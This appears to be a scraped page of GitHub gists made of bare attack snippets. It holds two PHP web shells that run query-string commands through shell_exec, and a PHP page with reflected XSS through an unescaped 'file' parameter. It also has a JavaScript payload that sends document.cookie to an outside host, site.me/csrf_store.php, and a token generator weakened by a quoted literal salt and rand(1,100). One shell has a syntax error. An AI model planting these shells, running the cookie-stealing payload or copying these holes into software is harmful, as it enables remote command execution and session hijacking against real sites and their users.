This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<HEAD><TITLE><?php echo $_GET['file'] ?></TITLE></HEAD><BODY><IMG src="<?php echo $_GET['file'] ?>" width="100%" height="100%" /></BODY> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$cde=$_GET['cmd']; | |
$options=$_GET['options']; | |
$commande=$cde.' '.$options; | |
$console_symbol='<b> > </b>'; | |
echo '<html><head><title>'.$commande.'</title></head><body>'; | |
echo $console_symbol.' '.$commande.' : <HR>'; | |
$retour_cde=shell_exec(''.$commande.' 2>&1 >/tmp/cmd.log;while read ligne; do echo $ligne"</BR>"; done < /tmp/cmd.log'); | |
$retour_cde=str_replace(' ',' ',$retour_cde); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<html><head><title><?php echo $_GET['cmd'].' '$_GET['options'] ?></title></head><body> | |
<?php echo shell_exec($_GET['cmd'].' '.$_GET['options']); ?> | |
</body></html> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
document.location="http://site.me/csrf_store.php?doc_cookies="+document.cookie; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$salt = microtime(); | |
$generated_token = MD5('$salt' . rand(1, 100)); | |
echo $generated_token; | |
?> |